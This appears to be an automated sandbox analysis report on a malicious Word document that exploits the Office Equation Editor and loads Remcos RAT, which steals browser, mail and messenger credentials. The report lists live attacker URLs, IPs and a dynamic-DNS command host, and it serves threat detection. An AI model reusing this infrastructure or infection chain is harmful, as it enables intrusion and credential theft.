                    Source: RegAsm.exe, 0000000C.00000002.911284833.00000000006F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_00434CB6 cpuid 12_2_00434CB6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: EnumSystemLocalesW, 12_2_0045201B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: EnumSystemLocalesW, 12_2_004520B6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 12_2_00452143
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW, 12_2_00452393
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: EnumSystemLocalesW, 12_2_00448484
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 12_2_004524BC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW, 12_2_004525C3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 12_2_00452690
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW, 12_2_0044896D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoA, 12_2_0040F90C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: IsValidCodePage,GetLocaleInfoW, 12_2_00451D58
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: EnumSystemLocalesW, 12_2_00451FD0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0041B890 GetSystemTimes,Sleep,GetSystemTimes,__aulldiv, 12_2_0041B890
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0041B69E GetComputerNameExW,GetUserNameW, 12_2_0041B69E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_00449210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 12_2_00449210
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_0041739B GetVersionExW, 13_2_0041739B
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

                    Source: Yara match File source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 11.2.powershell.exe.41ceb20.1.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 11.2.powershell.exe.41ceb20.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0000000C.00000002.911284833.00000000006D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000000C.00000002.911284833.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000000B.00000002.394834348.0000000003EA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: powershell.exe PID: 3884, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 3988, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 12_2_0040BA4D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 12_2_0040BB6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: \key3.db 12_2_0040BB6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULL
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULL
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqlite
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Paltalk
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4addJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: ESMTPPassword14_2_004033F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword14_2_00402DB3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword14_2_00402DB3
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4084, type: MEMORYSTR

                    Remote Access Functionality

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Mutex created: \Sessions\1\BaseNamedObjects\Rmc-OT0ZCG
Source: Yara match  File source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match  File source: 11.2.powershell.exe.41ceb20.1.unpack, type: UNPACKEDPE
Source: Yara match  File source: 11.2.powershell.exe.41ceb20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 0000000C.00000002.911284833.00000000006D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 0000000C.00000002.911284833.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 0000000B.00000002.394834348.0000000003EA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: Process Memory Space: powershell.exe PID: 3884, type: MEMORYSTR
Source: Yara match  File source: Process Memory Space: RegAsm.exe PID: 3988, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Code function: cmd.exe  12_2_0040569A
[MITRE ATT&CK matrix (interactive navigator). Tactic columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact. The per-technique signature counts did not survive text extraction.]
Behavior Graph ID: 1508111  Sample: xrrwwstCMd.docx  Start date: 09/09/2024  Architecture: WINDOWS  Score: 100

Start node
• DNS/IP: zeep.ly
• Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 24 other signatures
• WINWORD.EXE 347 49 (started)
  • DNS/IP: zeep.ly 95.217.202.210, 443, 49161, 49162 HETZNER-ASDE Germany; 85.239.241.184, 49167, 49169, 49171 CASABLANCA-ASInternetCollocationProviderCZ Czech Republic
  • Dropped: C:\Users\user\...\xrrwwstCMd.docx (copy), Microsoft; C:\Users\user\AppData\Roaming\...\rXgoN.url, MS; C:\Users\user\...\gvt on 85.239.241.184.url, MS; 3 other malicious files
  • Signatures: Microsoft Office launches external ms-search protocol handler (WebDAV); Office viewer loads remote template; Microsoft Office drops suspicious files
  • EQNEDT32.EXE 12 (started)
    • Dropped: C:\...\fastgeecleancheckupnewthinkstobege.vbs, Unicode
    • Signatures: Office equation editor establishes network connection; Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
    • wscript.exe 1 (started)
      • Signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Very long command line found; 3 other signatures
      • powershell.exe 4 (started)
        • Signatures: Suspicious powershell command line found; Suspicious execution chain found
        • powershell.exe 12 5 (started)
          • DNS/IP: ia601706.us.archive.org 207.241.227.96, 443, 49170 INTERNET-ARCHIVEUS United States
          • Signatures: Writes to foreign memory regions; Injects a PE file into a foreign processes
          • RegAsm.exe 3 10 (started)
            • DNS/IP: dremom2.duckdns.org (Uses dynamic DNS services); dremom2.duckdns.org 45.89.247.65, 2201, 49172, 49173 CMCSUS United Kingdom; geoplugin.net 178.237.33.50, 49174, 80 ATOM86-ASATOM86NL Netherlands
            • Signatures: Contains functionality to bypass UAC (CMSTPLUA); Detected Remcos RAT; Tries to steal Mail credentials (via file registry); 7 other signatures
            • RegAsm.exe 1 (started): Tries to steal Instant Messenger accounts or passwords; Tries to steal Mail credentials (via file / registry access); Searches for Windows Mail specific files
            • RegAsm.exe 1 (started): Tries to harvest and steal browser information (history, passwords, etc)
            • RegAsm.exe 11 (started)

Source | Detection | Scanner | Label
xrrwwstCMd.docx | 13% | ReversingLabs | Win32.Trojan.Generic
xrrwwstCMd.docx | 100% | Avira | TR/AVI.Malware.ujrxw

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\seethegeecakeisreallynicecakewhicgivingtasteoftherealgeeitscreatingniceforeverygeecakeloverswholoverthgeewhichnewonegetme__________nicecakeeateswellwithgee[1].doc | 100% | Avira | HEUR/Rtf.Malformed
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B0E0C498.doc | 100% | Avira | HEUR/Rtf.Malformed
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{BA66A863-2736-4CD9-8A42-3773360ED211}.tmp | 100% | Avira | EXP/CVE-2017-11882.Gen
                    No Antivirus matches
                    No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
zeep.ly | 95.217.202.210 | true | true | | unknown
dremom2.duckdns.org | 45.89.247.65 | true | true | | unknown
geoplugin.net | 178.237.33.50 | true | false | | unknown
ia601706.us.archive.org | 207.241.227.96 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://zeep.ly/rXgoN | false | Avira URL Cloud: safe | unknown
http://85.239.241.184/50/fastgeecleancheckupnewthinkstobegetme.tIF | true | Avira URL Cloud: safe | unknown
https://zeep.ly/rXgoN | false | Avira URL Cloud: safe | unknown
dremom2.duckdns.org | true | Avira URL Cloud: malware | unknown
http://85.239.241.184/50/gvt/seethegeecakeisreallynicecakewhicgivingtasteoftherealgeeitscreatingniceforeverygeecakeloverswholoverthgeewhichnewonegetme__________nicecakeeateswellwithgee.doc | true | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gp | false | Avira URL Cloud: safe | unknown
http://85.239.241.184/50/RMHC.txt | true | Avira URL Cloud: safe | unknown
https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg | true | Avira URL Cloud: safe | unknown
                            unknown
                            http://static.chartbeat.com/js/chartbeat.jsbhv71A7.tmp.13.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.msn.com/de-de/?ocid=iehpbhv71A7.tmp.13.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%bhv71A7.tmp.13.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://login.yahoo.com/config/loginRegAsm.exefalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.nirsoft.net/RegAsm.exe, 0000000F.00000002.402455012.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://ocsp.entrust.net0Dpowershell.exe, 0000000B.00000002.396943694.00000000051C1000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000009.00000002.398949438.0000000002391000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.393985624.0000000002271000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3bhv71A7.tmp.13.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683bhv71A7.tmp.13.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(bhv71A7.tmp.13.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9bhv71A7.tmp.13.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_shbhv71A7.tmp.13.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://85.239.241.184/50/fastgeecleancheckupnewthinkstobegetme.tIFmEQNEDT32.EXE, 00000007.00000002.379983063.00000000005AF000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.jsbhv71A7.tmp.13.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://nuget.org/NuGet.exepowershell.exe, 0000000B.00000002.394834348.0000000003299000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://www.ccleaner.com/go/app_cc_pro_trialkeybhv71A7.tmp.13.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://85.239.241.184/50/fastgeecleancheckupnewthinkstobegetme.tIFjEQNEDT32.EXE, 00000007.00000002.379983063.00000000005AF000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://crl.entrust.net/server1.crl0powershell.exe, 0000000B.00000002.396943694.00000000051C1000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.imvu.com/JKRegAsm.exe, 0000000F.00000002.402305414.000000000028C000.00000004.00000010.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://contextual.media.net/8/nrrV73987.jsbhv71A7.tmp.13.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://85.239.241.184/50/gvt/gvt on 85.239.241.184.url.0.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.imvu.comRegAsm.exe, RegAsm.exe, 0000000F.00000002.402455012.0000000000400000.00000040.80000000.00040000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.402847850.0000000001D59000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://contoso.com/Iconpowershell.exe, 0000000B.00000002.394834348.0000000003299000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://contextual.media.net/bhv71A7.tmp.13.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.jsbhv71A7.tmp.13.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2bhv71A7.tmp.13.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.msn.com/bhv71A7.tmp.13.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:aubhv71A7.tmp.13.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://geoplugin.net/json.gp%ARegAsm.exe, 0000000C.00000002.911284833.00000000006D5000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://crl.pkioverheid.nl/DomOvLatestCRL.crl0powershell.exe, 0000000B.00000002.396943694.00000000051C1000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549bhv71A7.tmp.13.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://85.239.241.184powershell.exe, 0000000B.00000002.393985624.00000000024CA000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://ia601706.us.archive.orgpowershell.exe, 0000000B.00000002.393985624.00000000023AA000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            http://cdn.at.atwola.com/_media/uac/msn.htmlbhv71A7.tmp.13.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://go.microsoft.cpowershell.exe, 0000000B.00000002.393589357.000000000019A000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://www.google.com/accounts/serviceloginRegAsm.exefalse
                            • Avira URL Cloud: safe
                            unknown
                            http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fsetbhv71A7.tmp.13.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://secure.comodo.com/CPS0powershell.exe, 0000000B.00000002.396943694.00000000051C1000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://policies.yahoo.com/w3c/p3p.xmlbhv71A7.tmp.13.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://ia601706.us.archive.org/2/items/new_image_LRpowershell.exe, 00000009.00000002.398949438.00000000024E1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://crl.entrust.net/2048ca.crl0powershell.exe, 0000000B.00000002.396943694.00000000051C1000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.msn.com/advertisement.ad.jsbhv71A7.tmp.13.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.ebuddy.comRegAsm.exe, RegAsm.exe, 0000000F.00000002.402455012.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
IP               Domain                    Country          Flag   ASN     ASN Name                                          Malicious
207.241.227.96   ia601706.us.archive.org   United States    US     7941    INTERNET-ARCHIVE                                  true
